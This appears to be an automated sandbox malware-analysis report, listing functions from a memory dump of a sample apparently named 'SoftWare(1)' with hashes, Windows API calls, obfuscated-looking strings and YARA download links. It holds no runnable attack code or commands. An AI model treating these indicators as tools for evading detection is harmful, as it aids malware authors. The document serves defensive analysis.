Instruction ID: a2bc08c9510a00a35cad7c7111a4469518fd51d0dca6b2bc40f924a1e8a31890
Opcode Fuzzy Hash: 1e7568b3513b15b59d9a6992666f00bd07616c750d9341e1691e795e227e8409
Instruction Fuzzy Hash: 5BD1C072E442058FCB04DEBDC5943EEBFF2AB86324F11D51AE415DBB9AD23686098F41

Function 6CF5EF4E Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CF5EF95
___scrt_uninitialize_crt.LIBCMT ref: 6CF5EFAF

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 18e0cf0ec406daeeef406fdb1e3fffc75a0db99264279b40eb117dbb0f38640c
Instruction ID: c6a4086c862378cfbefad52f1621b497575cc95e7f1cd9e09ac46b49e19d04a2
Opcode Fuzzy Hash: 18e0cf0ec406daeeef406fdb1e3fffc75a0db99264279b40eb117dbb0f38640c
Instruction Fuzzy Hash: 3E412A32E04214EFDB908F65CC40BEF3AB5EF60768F954196E61457B40DB354D258BE0

Function 6CF5EFFE Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6CF5F03B
dllmain_crt_dispatch.LIBCMT ref: 6CF5F052
dllmain_raw.LIBCMT ref: 6CF5F09A
dllmain_crt_dispatch.LIBCMT ref: 6CF5F0AD
dllmain_raw.LIBCMT ref: 6CF5F0C0

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 9b642cedf29bac63461211d0dd0bbb9d426e4af442384f27e158e95a101cccdb
Instruction ID: 4f7933cd512109e36316183f4a870ba45fdd2f316645396b41476127c5defb45
Opcode Fuzzy Hash: 9b642cedf29bac63461211d0dd0bbb9d426e4af442384f27e158e95a101cccdb
Instruction Fuzzy Hash: CF21F772D05225EBCBA18F65CC40BAF3E79DB90B98F954195FA1457700D7318D218BE0

Function 6CF66764 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6CF6676C

Part of subcall function 6CF666C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CF6881F,?,00000000,-00000008), ref: 6CF66722

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CF667A4
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CF667C4

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 16917e9c6cc8ac1dee4e89c6016506c4ea41628202af2f6db1fea0e611fec3c5
Instruction ID: b6f2309f8db0014fa9d9515a3eacd70850f49c8e91c1e9750097e552017c0c0a
Opcode Fuzzy Hash: 16917e9c6cc8ac1dee4e89c6016506c4ea41628202af2f6db1fea0e611fec3c5
Instruction Fuzzy Hash: B611A1B2A05516BEAA0116775CCDDAFBA7CDF8629C7610424F512E1E00FE75CD1482B1

Function 6CF5EE47 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6CF5EE94

Part of subcall function 6CF5F363: InitializeSListHead.KERNEL32(6CFC74C0,6CF5EE9E,6CF72F40,00000010,6CF5EE2F,?,?,?,6CF5F057,?,00000001,?,?,00000001,?,6CF72F88), ref: 6CF5F368

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF5EEFE

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: f992ea191da86df2126045102a413017f9f4c6d9078b1567f46731dc3efc3ca9
Instruction ID: 1b663310ff7c5b769036ebc869aae82dcde8eb57c27daf312d6494c58e862a9f
Opcode Fuzzy Hash: f992ea191da86df2126045102a413017f9f4c6d9078b1567f46731dc3efc3ca9
Instruction Fuzzy Hash: EC210531B593069EEB44ABB5D8007DD3BA14F3632CFA10499D7902BFC1CB7B016986A5

Function 6CF66D61 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6CF66DAD
GetFileType.KERNELBASE(00000000), ref: 6CF66DBF

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 9c60979dff5be0ce33233b29dba779ce05df35eb8d45fbe64fc0cd09221de6d6
Instruction ID: 62439c7d921ae6df4c45fb2ce465938caf19bcbd20b058b6e3289e15c664a7d8
Opcode Fuzzy Hash: 9c60979dff5be0ce33233b29dba779ce05df35eb8d45fbe64fc0cd09221de6d6
Instruction Fuzzy Hash: E4118E726087524ADB204E3FCC89B53BAA5AB57278B38071EF4B6C6DE1C331D586C684

Function 6CF65062 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6CF6606C,?,?,6CF6606C,00000220,?,00000000,?), ref: 6CF65094

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f4a8ccdd5eaaaa70b56ef3ad25e368217614c7c68214fcd83cff0774289bada8
Instruction ID: 5dde18bee5150f8bd06403fa5b27e5ca0dc7df55f2a363dd6ebfea3925817551
Opcode Fuzzy Hash: f4a8ccdd5eaaaa70b56ef3ad25e368217614c7c68214fcd83cff0774289bada8
Instruction Fuzzy Hash: 87E09B336452177AFB1116E7CC00F9B37589F437A4F610211EC96F6D83DB60D80586E4

Non-executed Functions

Function 6CF59E90 Relevance: 7.2, Strings: 5, Instructions: 967COMMON

Download Yara Rule

Strings

&3, xrefs: 6CF5A5FB
&3, xrefs: 6CF5A570
vJ<, xrefs: 6CF5AC18
vJ<, xrefs: 6CF5AACE
C]), xrefs: 6CF5A92A

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: C])$vJ<$vJ<$&3$&3
API String ID: 0-300973795
Opcode ID: 0aeb6a0bd7c296570a60e3a4c3614689bca13f3b098e4c1c57a4b449afe2a04d
Instruction ID: 9ff4a167157e3db4b45740a2220971ad9292d7b6cb944b4e54a63b40a7ca748f
Opcode Fuzzy Hash: 0aeb6a0bd7c296570a60e3a4c3614689bca13f3b098e4c1c57a4b449afe2a04d
Instruction Fuzzy Hash: 57623477B542058FCF09CE7CC5D43EF3BF2AB56310F60811AD621D7B94D62A8A6A8B50

Function 6CF452C0 Relevance: 7.1, Strings: 5, Instructions: 827COMMON

Download Yara Rule

Strings

hodebemmfvqcnjjhazithsrm, xrefs: 6CF45773
bxjwdhkoiousbe, xrefs: 6CF4578B, 6CF45919, 6CF4592E
u7q@, xrefs: 6CF458F8
E, xrefs: 6CF45F23
l|` , xrefs: 6CF45C7B

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: E$bxjwdhkoiousbe$hodebemmfvqcnjjhazithsrm$l|` $u7q@
API String ID: 0-133057723
Opcode ID: 7f4c9f2382f9c7a1d172e3cdfadcff7fb5e6c70b1356adb0674890c65b468dd3
Instruction ID: 175ec5d4d40304f65a450bd2b09b0cd93e4f2bb04d0755486aa81a2d74fd66b9
Opcode Fuzzy Hash: 7f4c9f2382f9c7a1d172e3cdfadcff7fb5e6c70b1356adb0674890c65b468dd3
Instruction Fuzzy Hash: 1A5206726593028FD704DE3CC4953DF7FE2AB93324F508A1DE4A58BA96C639C54E8B42

Function 6CF592F0 Relevance: 6.7, Strings: 5, Instructions: 416COMMON

Download Yara Rule

Strings

L~L, xrefs: 6CF59553
;juX, xrefs: 6CF596E7
GjZ0, xrefs: 6CF5966A
L~L, xrefs: 6CF594D4
;juX, xrefs: 6CF59752

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: ;juX$;juX$GjZ0$L~L$L~L
API String ID: 0-683031464
Opcode ID: fb848149050c25c51931393221d7fd934dc272b25a194672a53aa0332c0e3824
Instruction ID: fbb03f0915dff381505b64a8a0e0c90027c9299909fcbfb76187c19198c91ff9
Opcode Fuzzy Hash: fb848149050c25c51931393221d7fd934dc272b25a194672a53aa0332c0e3824
Instruction Fuzzy Hash: 42D1F5B2A505058FDF08CE7CC4D53DF77F1AB16361F619119DA21ABB90CE3A8A0A8B54

Function 6CF5F682 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CF5F68E
IsDebuggerPresent.KERNEL32 ref: 6CF5F75A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CF5F773
UnhandledExceptionFilter.KERNEL32(?), ref: 6CF5F77D

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 9560b8aa6ac444d5771dc7314b30e0f4f30a594976f277fd7e733482b1f49457
Instruction ID: b888f8dd5b998fab92c56b6f727d3b1c155d6fd1506e851f5801e08662d6aa4b
Opcode Fuzzy Hash: 9560b8aa6ac444d5771dc7314b30e0f4f30a594976f277fd7e733482b1f49457
Instruction Fuzzy Hash: 0D311675D05219EBDF60DFA5D9897CDBBB8AF08304F1041EAE50CAB240EB709A85CF44

Function 6CF6361C Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CF63714
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CF6371E
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CF6372B

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e73275f27af2c424624095fa644ea298566b84c9bb95c3280f56b46c6db7a731
Instruction ID: 66a5552eff761913c80caff389a8567361db72f5af1f7aa682c1c4852ffb755c
Opcode Fuzzy Hash: e73275f27af2c424624095fa644ea298566b84c9bb95c3280f56b46c6db7a731
Instruction Fuzzy Hash: 3B31E374D1122DABCB61DF65D988BCDBBB8BF08314F6041EAE41CA7250E7309B858F44

Function 6CF5AFD0 Relevance: 3.0, Strings: 2, Instructions: 459COMMON

Download Yara Rule

Strings

^!Jh, xrefs: 6CF5B3F9
fzzv, xrefs: 6CF5B356

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: ^!Jh$fzzv
API String ID: 0-1917174378
Opcode ID: 52b782c6f59d29b20744e169389846455fb2fad9593f42594837136dce29b794
Instruction ID: fb69d622e69ecf89d2e2d3e40344091884c9f783e11826154c29d564f03d2bc4
Opcode Fuzzy Hash: 52b782c6f59d29b20744e169389846455fb2fad9593f42594837136dce29b794
Instruction Fuzzy Hash: 86F13836E45205CFCF04CEBCD5943DE7BF2EB1A354F608916D521EBBA4D22A8A188F15

Function 6CF464A0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

jfbwdbkpqbwyaothubqkevjuzzrcwlfuqckhwpdqnabwaxciahmdokqbmpdxxpdwkfaford, xrefs: 6CF466DE
`rcN, xrefs: 6CF46A0A

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: `rcN$jfbwdbkpqbwyaothubqkevjuzzrcwlfuqckhwpdqnabwaxciahmdokqbmpdxxpdwkfaford
API String ID: 0-2495920147
Opcode ID: ecb60929d22a95074c3bf5ed250e72e8528198b86a20f73c8b30566c868a735b
Instruction ID: f0d23c11b2cc3bf7574ccca40fe64cfa1069b2e82e321671c9ab914599acce58
Opcode Fuzzy Hash: ecb60929d22a95074c3bf5ed250e72e8528198b86a20f73c8b30566c868a735b
Instruction Fuzzy Hash: FCE1A172654F408FC724CF2CC595797BBF1AB82324F10CA1AE4A6CBB56D635E90A8F44

Function 6CF5C110 Relevance: 2.6, Strings: 2, Instructions: 133COMMON

Download Yara Rule

Strings

bad array new length, xrefs: 6CF5C205, 6CF5C2A5
2:#, xrefs: 6CF5C28C

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: 2:#$bad array new length
API String ID: 0-3388646995
Opcode ID: 93eeeaa4d644bdcaa0b80ebd7761cd85d448f7d0393ed0386f0a7553a00bf1e4
Instruction ID: 1ea89ca0a0e602f6f2fb77dae4ac74f5ce304d32a9da911ef3356b7f865ac559
Opcode Fuzzy Hash: 93eeeaa4d644bdcaa0b80ebd7761cd85d448f7d0393ed0386f0a7553a00bf1e4
Instruction Fuzzy Hash: 4C413972A415098FCF04DEBCC4D57EF7BF5AB57324F514619C622ABB84D2315619CB80

Function 6CF5B710 Relevance: 1.8, Strings: 1, Instructions: 555COMMON

Download Yara Rule

Strings

~w, xrefs: 6CF5BDA7

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: ~w
API String ID: 0-2615944315
Opcode ID: bcbd40b9cf5a09921247a378a9f1404183942070892e57a4b059b0fabd96498b
Instruction ID: 67a3e7a3b7b1add032ccf7ab1312d9ccedab5f97cd651a4dfa1ce02fdeedd1f0
Opcode Fuzzy Hash: bcbd40b9cf5a09921247a378a9f1404183942070892e57a4b059b0fabd96498b
Instruction Fuzzy Hash: 4D122336F451058FCB08CEBCD5C53DE7BF2AB6A310F609906E612E7B64D63A99158F10

Function 6CF6B997 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CF6B992,?,?,00000008,?,?,6CF6B595,00000000), ref: 6CF6BBC4

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b196dcf3481d88d2bc21ef4241ec62309347f24604c15acb7d9be228c4c27700
Instruction ID: ee01dccc5003c03c3f81b777f20e5f314709b2739abe34f8db79326ee14ebf7c
Opcode Fuzzy Hash: b196dcf3481d88d2bc21ef4241ec62309347f24604c15acb7d9be228c4c27700
Instruction Fuzzy Hash: B1B16B32210609DFD705CF29C486B557BE0FF05369F258A58F8A9CFAA1C735EA82DB40

Function 6CF5F848 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CF5F85E

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: c783b69e000ec112ddbc0d0cc107c0a81e25fade772c9dc3a44d12566ed50fa7
Instruction ID: be4f8cbcb5fa5e1ecaafb65d5ea44d504d5efdf2fd162763c7acf9a4c8e07a62
Opcode Fuzzy Hash: c783b69e000ec112ddbc0d0cc107c0a81e25fade772c9dc3a44d12566ed50fa7
Instruction Fuzzy Hash: 6A51ADB1F1561A9FEB89CF54C8817AEBBF0FB59314F2085AAD515EB280D374EA10CB50

Function 6CF6556D Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16910e3bc0c2ce97d653281f8d967e3a15d8c441b94f3b6b7159375bdbbaaa00
Instruction ID: 92c41da13ec0e40d7845a77caded83ed72bd029fd2f7de7fb49e50919c92ac23
Opcode Fuzzy Hash: 16910e3bc0c2ce97d653281f8d967e3a15d8c441b94f3b6b7159375bdbbaaa00
Instruction Fuzzy Hash: E24182B580521DAFDB10DF6ACC88AEABBB9AF45308F1442DDE419E3A01DB359E459F10

Function 6CF5D330 Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

80', xrefs: 6CF5D718

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: 80'
API String ID: 0-28623994
Opcode ID: 5c054ce56bb87d6bba3e993b9f84c2d95662cc9422fd0b72e30a9e3ad4cd1984
Instruction ID: d1e13ac49e10da1e10cb4f2115f4427f7e584a9d7ab0b4947d59b59cf484f2a8
Opcode Fuzzy Hash: 5c054ce56bb87d6bba3e993b9f84c2d95662cc9422fd0b72e30a9e3ad4cd1984
Instruction Fuzzy Hash: 18C1F376A022058FDF04CF7CD6947DF7BF2AB5A324F209219D911EB794D2365A09CB50

Function 6CF59880 Relevance: 1.6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

Strings

yy, xrefs: 6CF59ADE

Memory Dump Source

Source File: 00000000.00000002.1693466468.000000006CF41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF40000, based on PE: true

Associated: 00000000.00000002.1693446393.000000006CF40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693544432.000000006CF6D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693581576.000000006CF74000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1693690857.000000006CFC8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf40000_SoftWare(1).jbxd

Similarity

API ID:
String ID: yy
API String ID: 0-3648868405
Opcode ID: dd608d53350f1ff1bd7e054da736f7a894c89abd05431afdef614300187a0d8c
Instruction ID: 2b7bb8c4c5035a53a010cc2c9530ba3c11d8098f07913e9af0b820c8763d5a6a
Opcode Fuzzy Hash: dd608d53350f1ff1bd7e054da736f7a894c89abd05431afdef614300187a0d8c
